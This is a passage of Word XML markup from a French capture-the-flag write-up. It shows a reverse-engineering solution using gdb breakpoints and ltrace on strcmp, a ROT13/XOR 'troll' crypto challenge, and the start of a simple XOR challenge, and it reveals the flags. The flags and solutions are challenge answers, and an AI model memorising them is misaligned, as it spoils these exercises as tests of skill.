            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Dump of assembler code for function main:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">   0x0000000000400596 &lt;+0&gt;:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>push   rbp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">   0x0000000000400597 &lt;+1&gt;:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>mov    rbp,rsp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">   0x000000000040059a &lt;+4&gt;:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>sub    rsp,0x30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>[...]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0x0000000000400603 &lt;+109&gt;:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>call   0x400480 &lt;strcmp@plt&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">   0x0000000000400608 &lt;+114&gt;:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>test   eax,eax</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>[...]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>On va poser un breakpoint sur l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">’instruction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (main+114)</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color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> b* main+114</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Breakpoint 1 at 0x400608</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> r toto</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>[...]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Breakpoint 1, 0x0000000000400608 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> x/s $rdi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0x7fffffffe2b0:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>"toto"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> x/s $rsi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0x7fffffffdde0:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>"ese{wh@t_is_the_re@l_fl@g?}"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Nous regardons les registres rdi et rsi qui sont utilisés lors de la comparaison et  nous les affichons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Une autre méthode consistait à utiliser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pour déterminer les arguments dans la fonction de comparaison </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>strcmp</w:t>
      </w:r>
      <w:r>
        <w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>./ELF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50 le_flag_est_la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>__libc_start_main(0x400596, 2, 0x7ffd46bb8318, 0x400650 &lt;unfinished ...&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>strcmp("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>le_flag_est_la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{wh@t_is_the_re@l_fl@g?}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>")                                                             = 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>puts("nooo"nooo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>)                                                                                                        = 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>+++ exited (status 0) +++</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Et hop on récupère le flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{wh@t_is_the_re@l_fl@g?}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc630980451"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>REVERSE 50 - ELF 50 Bis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Texte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc1179904586"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>REVERSE 100 - ELF 100</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Texte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc1417630314"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>REVERSE 150 - ELF 150</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Texte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc1335023265"/>
      <w:r>
        <w:t>REVERSE 350 - THE GAME</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Texte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc1332550964"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Challenges et résolutions des épreuves - Crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc719675004"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 50 - Crypto Troll</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L’énoncé nous donnait le message suivant “ABACBCBABCBACBACBCABCABCBACBBBBAA” et indiquait avec quel algorithme il a été généré : (rot13(cesar-crypt(msg[i], 13)) ^ 0x42 ^ 0x42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On voit déjà que les XOR s'annulent, on se rappelle de la table du XOR</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&gt;&gt;&gt; 0^0 = 0</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&gt;&gt;&gt; 0^1 = 1</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&gt;&gt;&gt; 1^0 = 1</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 xml:space="preserve">&gt;&gt;&gt; 1^1 = 0 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Donc un XOR de 2 mêmes nombres s'annule : 0x42 ^ 0x07 ^ 0x42 = 0x07.  On peut donc déja réduire le chiffrement à : rot13(cesar-crypt(msg[i], 13))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Après une petite recherche sur le rot13 on apprend que c'est un césar avec un décalage de 13: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>cesar-crypt(cesar-crypt(msg[i], 13), 13))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le chiffrement César est un simple décalage dans l'alphabet si on décale la lettre A de 13 places on obtient un N, comme le montre le code python ci-dessous :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; print chr(ord('A')+13)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L'alphabet n'étant composé que de 26 lettres, un déplacement de 13 places suivi par un second de 13 places nous ferait arriver au même point:</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Normal    : ABCDEFGHIJKLMNOPQRSTUVWXYZ</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13 places : NOPQRSTUVWXYZABCDEFGHIJKLM</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13 places : ABCDEFGHIJKLMNOPQRSTUVWXYZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L'algorithme de chiffrement est donc inutile car le message est conservé... Ce challenge était un simple troll, le message est donc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ese{ABACBCBABCBACBACBCABCABCBACBBBBAA}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc99050113"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 50 - Simple xor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’énoncé du challenge est un script python dont il faut retrouver la clef.</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enc(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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rPr>
                <w:color w:val="000000"/>
              </w:rPr>
